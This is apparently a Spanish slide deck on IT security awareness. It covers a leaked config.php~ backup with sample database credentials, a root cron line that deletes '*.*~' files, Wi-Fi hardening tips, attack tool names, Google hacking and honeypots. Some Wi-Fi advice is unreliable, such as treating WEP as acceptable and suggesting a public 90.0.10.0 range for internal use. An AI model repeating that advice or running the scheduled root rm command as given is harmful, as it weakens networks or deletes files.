  • 53. Algunos ejemplos: Dirección: http://www.sitioweb.com/config.php~ <?php /*Variables base de datos*/ $sys['db_host'] = "localhost"; $sys['db_username'] = "root"; $sys['db_password'] = "123"; $sys['db_database'] = "base_de_datos"; echo "<center>ESTA PAGINA ES PRIVADA"; ?>
  • 54. Algunos ejemplos: Solución al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOS TEMPORALES /etc/crontab */5 * * * * root rm /var/www/*.*~
  • 56. PROTECCIÓN DE REDES WI-FI EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIÓN FÍSICA (No hay cables) LO QUE CONLLEVA A QUE SEA MÁS FÁCIL ACCEDER A ELLAS REMOTAMENTE EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES.
  • 57. PROTECCIÓN DE REDES WI-FI  Apagar el router o access point cuando no se ocupe  Nunca entregar la clave Wi-Fi a terceros  Utilizar claves de tipo WPA2. Como segunda opción WPA y en el peor de los casos WEP (128 y 64 bits)  Habilitar el control de acceso por MAC. Son fáciles de clonar pero pone una barrera más  Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc)  Deshabilitar el acceso inalámbrico a la configuración  Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)  Desactivar el broadcasting SSID  Desactivar DHCP. Utilizar sólo IP manuales dentro de rangos poco convencionales. (Ej: 90.0.10.0 – 90.0.10.254)  Usar VPN si fuese posible.
  • 58. PROTECCIÓN DE REDES WI-FI  Cambiar regularmente las claves Wi-Fi (tanto administración como clave de red).  Guardar bien las claves de administración  Usar contraseñas complicadas. (Ej: E_aR@_1-x  No usar dispositivos Wi-Fi cerca de hornos microondas ni teléfonos inalámbricos  Realizar un scaneo local de las redes disponibles para evitar interferencias. LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11
  • 60. HERRAMIENTAS DE SEGURIDAD COMERCIALES GFI LANGUARD SECURITY SCANNER www.gfi.com ACUNETIX WEB SCANNER www.acunetix.com N-Stalker (ex N-Stealth) www.nstalker.com
  • 61. HERRAMIENTAS DE SEGURIDAD GRATIS NMAP (Network Mapper) www.insecure.org/nmap NESSUS www.nessus.org
  • 62. Scanners de vulnerabilidades • Esto es una herramienta que permite escanear una computadora en una red para vulnerabilidades ya conocidas. • Estas vulnerabilidades pueden ser tanto en la red como en el sistema operativo y en aplicaciones. • Ej: Nessus,GFI LANguard,Retina,Sara.
  • 64. Password Cracker • Es el proceso de recuperar el password de data almacenada y/o transmitida por una computadora o dispositivo electrónico. • Vectores de ataques: Encripción debil, Adivinar, Ataques por diccionarios,Fuerza Bruta (Brute Force). • Ej. Cain and Abel, John the Ripper,THC Hydra y L0phtcrack.
  • 66. Packet sniffer • Esto es una herramienta que permite capturar los paquetes de datas que son transmitidos en una red. • Estos tambien se utilizan en conjunto a password crakers. • Ej.Wireshark, Kismet ,Tcpdump,Ettercap y Cain and Abel.
  • 68. Spoofing attacks • En esta situación el atacante logra fingir ser un servidor o un equipo o una aplicación para lograr que sus victimas se comuniquen con el y no con el destinatario real. • Man-in-the-middle attack y URL spoofing dsniff,Karma,AirJack,Ettercap y Cain and Abel.
  • 70. Y para mayor INSEGURIDAD: Google Hacking ¿Qué es el Google Hacking? Ejemplos • Muchos de ustedes se preguntaran qué es eso del Google Hacking?? Es bien sencillo. El Google Hacking consiste en explotar la gran capacidad de almacenamiento de información de Google, buscando información específica que ha sido añadida a las bases de datos del buscador. Si las búsquedas las orientamos a ciertas palabras clave que nos ayuden a encontrar información sensible, puntos de entrada sensibles a posibles ataques, o cualquier otro tipo de información que tuviera carácter de sensibilidad, estaremos ejecutando un Google hack. Resumiendo: Google Hacking es buscar en Google información sensible, generalmente, con fines maliciosos.
  • 72. Ejemplo – Datos personales - direcciones de correo – telefonos – informacion personal
  • 74. Ejemplo – ficheros que contienen claves
  • 76. Ejemplo – deteccion de servidores Web
  • 77. Google Hacking • Mediante esta técnica, es posible encontrar información sobre : – Productos vulnerables – Mensajes de error – Ficheros que contienen información sensible – Ficheros que contienen claves – Ficheros que contienen nombres de usuario – Footholds e información de apoyo al acceso – Páginas con formularios de acceso – Páginas que contienen datos relativos a vulnerabilidades – Directorios sensibles – Información sensible sobre comercio y banca electrónica – Dispositivos hardware online – Ficheros vulnerables – Servidores vulnerables – Detección de servidores web
  • 78. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks?
  • 79. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks? 1. Aprenda cómo funciona Google. Conozca y experimente las posibilidades de la búsqueda avanzada. Entienda que las búsquedas son muy refinables y que es un motor de búsqueda muy poderoso, que no sólo está pensado para ordenar y encontrar páginas web, sino que también pueden hallarse documentos ofimáticos, informes, faxes, memorandos, notas, fotografías, teléfonos … es decir, absolutamente todo lo que sea accesible puede acabar en las bases de datos de Google.
  • 80. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks? 1. Una vez entendido el punto primero, entienda que igual que podemos usar Google para hallar documentos inocuos, podemos emplearlo para obtener documentos con datos sensibles. Grábeselo en la cabeza. Hay gente que vive de este tipo de técnicas y de la información que extrae de ellas.
  • 81. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks? 1. Si dispone de página web, asegúrese de comprender lo importante que es tener un fichero de robots.txt correctamente configurado. Tener una página web es algo más que colocar fotos y documentos en la Red para que las vean los amiguetes. Nuevamente incidimos en que todo lo que se coloca en servidores Web es susceptible de acabar siendo indexado en las bases de datos de Google. Esto es aplicable para cualquier objeto accesible desde documentos Web: cámaras web, impresoras, etc.
  • 82. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks? • No deje de consultar los parámetros que definen el mecanismo de posicionamiento de resultados en Google. Aplique “posicionamiento inverso” a todo aquello que quiera mantener lejos de ojos ajenos. Puestos a aparecer, mejor aparecer en el puesto doscientos que en el quinto. No está de más usar el buscador para aprender cómo funciona el Google hacking y aplicar técnicas de inversión aplicadas a su caso.
  • 83. Google Hacking ¿Cómo impedir ser víctimas de Google Hacks? • Si usted tiene un buen nivel técnico y administra máquinas corporativas, quizás debería plantearse no sólo la revisión de las políticas de exclusión de robots, sino además, debería probar un honeypot especializado. Le proponemos Google Hack Honeypot. Funciona muy bien y le brindará información interesante sobre Google hackers que intenten explotar en sus sitios Web este tipo de técnicas 2. Sería recomendable también que leyera documentos con ideas sobre este honeypot, en caso de que opte por emplearlo.
  • 84. Google Hacking • Que es un Honeypot?? – Se denomina Honeypot al software o conjunto de computadores cuya intención es atraer a crackers o spammers, simulando ser sistemas vulnerables o débiles a los ataques. Es una herramienta de seguridad informática utilizada para recoger información sobre los atacantes y sus técnicas. Los Honeypots pueden distraer a los atacantes de las máquinas más importantes del sistema, y advertir rápidamente al administrador del sistema de un ataque, además de permitir un examen en profundidad del atacante, durante y después del ataque al honeypot.
  • 85. Google Hacking Honeypot • Algunos honeypots son programas que se limitan a simular sistemas operativos no existentes en la realidad y se les conoce como honeypots de baja interacción y son usados fundamentalmente como medida de seguridad. Otros sin embargo trabajan sobre sistemas operativos reales y son capaces de reunir mucha más información; sus fines suelen ser de investigación y se los conoce como honeypots de alta interacción.
  • 86. Google Hacking Honeypot • Un tipo especial de honeypot de baja interacción son los sticky honeypots ( honeypots pegajosos) cuya misión fundamental es la de reducir la velocidad de los ataques automatizados y los rastreos. • En el grupo de los honeypot de alta interacción nos encontramos también con los honeynet. • También se llama honeypot a un website o sala de chat, que se ha creado para descubrir a otro tipo de usuarios con intenciones criminales,
  • 87. PARA REFLEXIONAR • NOS HEMOS PUESTO A PENSAR QUE PODEROSO ES GOOGLE – Y QUE IMPRESCINDIBLE EN NUESTRA VIDA WEB. • MICROSOFT ES UN GIGANTE, PERO EN LA RED EL QUE MANDA ES GOOGLE. • Y LA INTERROGANTE ES: ¿HASTA DONDE LLEGARA GOOGLE? ¿CUANTO DEPENDEREMOS DE EL EN UN FUTURO?
  • 88. Tema aparte: los Crackers Aquí algunos Famosos Fred Cohen Robert Tappan Morris Kevin David Mitnick Chen Ing- Hou (maestro)
  • 89. Herramientas usadas por los crackers • Las herramientas de cracking son los programas y aplicaciones que ayudan al cracker a lograr su fin, aunque estos programas no necesariamente debieron estar diseñados para ese fin específico. • Categorías: – Desensamblador – Ensamblador – Depurador (debugger) – Editor hexadecimal – Compilador
  • 90. Herramientas usadas por los crackers • Desensamblador – Un desensamblador es un programa de computación que traduce desde lenguaje máquina (código binario) al lenguaje de programación (assembler). – El programa desensamblador a utilizar, por trabajar con lenguaje máquina y ensamblador, depende exclusivamente del microprocesador que estamos usando (para que pueda reconocer las instrucciones del código binario), de la arquitectura de la máquina y del sistema operativo en uso (no es lo mismo Windows que Linux).
  • 91. Herramientas usadas por los crackers • Ensamblador – El término ensamblador (del inglés assembler) se refiere a un tipo de programa informático que se encarga de traducir un fichero fuente escrito en un lenguaje ensamblador, a un fichero objeto que contiene código máquina, ejecutable directamente por la máquina para la que se ha generado. El propósito para el que se crearon este tipo de aplicaciones es la de facilitar la escritura de programas, ya que escribir directamente en código binario, que es el único código entendible por la computadora, es en la práctica imposible. La evolución de los lenguajes de programación a partir del lenguaje ensamblador originó también la evolución de este programa ensamblador hacia lo que se conoce como programa compilador.
  • 92. Herramientas usadas por los crackers • Depurador • Un depurador (en inglés, debugger), es un programa que permite depurar o limpiar de errores otro programa informático. • Ejemplos de depuradores: – GNU Debugger (gdb) – SoftICE – OllyDbg – Trw2000 – Ida Pro
  • 93. Herramientas usadas por los crackers • Editor hexadecimal • Un editor hexadecimal (o editor de archivos binarios) es un tipo de programa de ordenador que permite a un usuario modificar archivos binarios. Los editores hexadecimales fueron diseñados para editar sectores de datos de disquetes o discos duros por lo que a veces se llaman "editores de sectores". • Utilizando un editor hexadecimal un usuario puede ver o puede redactar el contenido intacto y exacto de un archivo al contrario que con la interpretación del mismo contenido que otro, de nivel más alto software de aplicaciones puede asociar por la extensión de archivo. Por ejemplo, los datos intactos de la imagen (los raws), y la manera de interpretar el mismo archivo del software de edición de imágenes. • En la mayoría de los editores hexadecimales los datos del archivo son representados como valores hexadecimales agrupados en dos grupos de 8 bytes y un grupo de 16 caracteres ASCII, los caracteres no reconocidos son representados normalmente por un punto "." en ASCII. • El estándar comando Unix shell es usado para mostrar (aunque no editar) un archivo en hexadecimal y octal es od.
  • 95. Herramientas usadas por los crackers • Compilador – Un compilador es un programa que, a su vez, traduce un programa escrito en un lenguaje de programación a otro lenguaje de programación, generando un programa equivalente. Usualmente el segundo lenguaje es código máquina, pero también puede ser simplemente texto. Este proceso de traducción se conoce como compilación. – La razón principal para querer usar un compilador es querer traducir un programa de un lenguaje de alto nivel, a otro lenguaje de nivel inferior (típicamente lenguaje máquina). De esta manera un programador puede diseñar un programa en un lenguaje mucho más cercano a como piensa un ser humano, para luego compilarlo a un programa más manejable por una computadora.
  • 96. Pero también debemos hablar de TEMAS MAYORES
  • 97. Cyber Terrorismo  Es un término controversial  Definición mayormente aceptada = Es el uso predeterminado de actividades perjudiciales o amenazas a sistemas de computadoras o networks con la intención de causar daño o avanzar su causa política, sociales, religiosa o ideológica.
  • 98. Cyber Warfare  Cyber Warfare = Es el uso de computadoras y el internet para conducir guerra o guerrillas en el cyberespacio.  Cyber Guerrero = Individuo alta mente versado en las áreas de: programación, seguridad informática, redes, espionage y computer forensics. Gobiernos, Ejércitos y agencias de la ley están entrenando en grandes cantidades a sus miembros en estas áreas.
  • 99. PARA TENER SIEMPRE EN CUENTA… • Que no todos los ataques o problemas de seguridad son sofisticados, a veces son meros engaños simples (“viveza” o “criollada” acá en Perú), como la llamada Ingeniería Social (un término más bonito, o como dicen “más cool”, o mejor dicho más técnico)
  • 100. Pero definitivamente lo más dramático • Es recordar que la seguridad de TI no sólo se puede y debe reducir a un ámbito empresarial, sino que también debe incluir el ámbito social colectivo, pues lamentablemente las TI son tan poderosas que pueden ser usadas tanto para hacer lo correcto, como lo incorrecto y hasta lo más indignante como la Pornografía Infantil y la Trata de Personas. • Veamos las dos caras del uso de las TI
  • 102. • Cerca del 80% de los ‘ataques’ provienen del interior. • No se notifican todos los ataques que se reciben. • Muchos accidentes humanos se reportan como ataques. • No es eficiente hacer una alta inversión puntual y olvidarse durante un tiempo.
  • 103. • La seguridad es un proceso, un camino continuo. • Se tiene que diferenciar de lo que hay que protegerse.  Errores involuntarios. (Maquinaria y personal)  Ataques voluntarios. (Internos y externos)  Desastres naturales.